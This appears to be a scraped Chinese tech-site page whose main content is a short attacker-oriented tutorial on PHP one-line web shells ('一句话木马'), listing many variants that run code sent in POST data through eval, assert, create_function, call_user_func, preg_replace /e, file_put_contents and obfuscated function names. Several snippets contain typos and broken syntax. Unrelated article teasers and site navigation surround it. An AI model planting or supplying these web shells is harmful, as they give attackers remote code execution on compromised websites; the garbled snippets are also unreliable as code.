客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 例如:<?php @eval($_POST['a']);?> 其中 eval 就是执行命令的函数,$_POST['a'] 就是接收的数据。 eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。
使用 其他函数制作一句话木马assert函数<?php assert[@$_POST['a']);?> creat_funcction函数<?php $fun = creat_function('',$_POST['a']); $fun(); ?> 把用户传递的数据生成一个函数fun(),然后再执行fun() call_user_func回调函数<?php @call_user_func(assert,$_POST['a']); ?> call_user_func这个函数可以调用其他函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。 preg_replace函数<?php @preg_replace("/abcde/e",$_POST['a'],"abcdefg"); ?>
file_put_contents函数<?php $test='<?php $a=$a_POST["cmd"];assert($a);?>'; file_put_contents("Trojan.php",$test); ?> 函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件内容。 str_replace函数<?php $a=str_replace("Walao","","eWaldoval"); $a=(@$_POST['a']); ?>
base64_decode函数<?php $a=base64_decode("ZXZhbA==") $a($_POST['a']); ?> parse_str函数<?php $str="a=eval"; parse_str($str); $a($a_POST['a']); ?> PHP变量函数①<?php $a = "eval"; $a(@$_POST['a']); ?> 第三行使用了变量函数$a,变量存储了函数名eval,便可以直接使用变量替代函数名。 ②<?php $bb="eval"; $a="bb"; $$aa($_POST['a']); ?>
<?php $a="e"."v"; $b="a"."l"; $c=$a.$b; $c=($_POST['a']); ?> <?php function fun() {return $_POST['a'];} @preg_replace("/test/e",fun(),"test test test"); ?>
|
2022-08-15
2022-08-30
2022-08-17
2022-11-06
2022-08-18
jguyomard/docker-laravel: Docker Images for Laravel development
librespeed/speedtest: Self-hosted Speedtest for HTML5 and more. Easy setup, exam
avehtari/BDA_m_demos: Bayesian Data Analysis demos for Matlab/Octave
女人怀孕后,为了有一个健康聪明的宝宝,经历各种体检、筛查。其实这些体检和筛查中的
1.求对数 只写log不写底数,默认其底数是e,即等同于自然对数ln,log()=ln()。 底
medfreeman/markdown-it-toc-and-anchor: markdown-it plugin to add a toc and ancho
IBM Engineering Requirements Quality Assistant On-Premises (All versions) is vul
feedjira/feedjira: A feed parsing library
sydney0zq/covid-19-detection: The implementation of A Weakly-supervised Framewor
离中国最远的国家是阿根廷。从太平洋直线计算,即往东线走,北京到阿根廷的布宜诺斯艾
请发表评论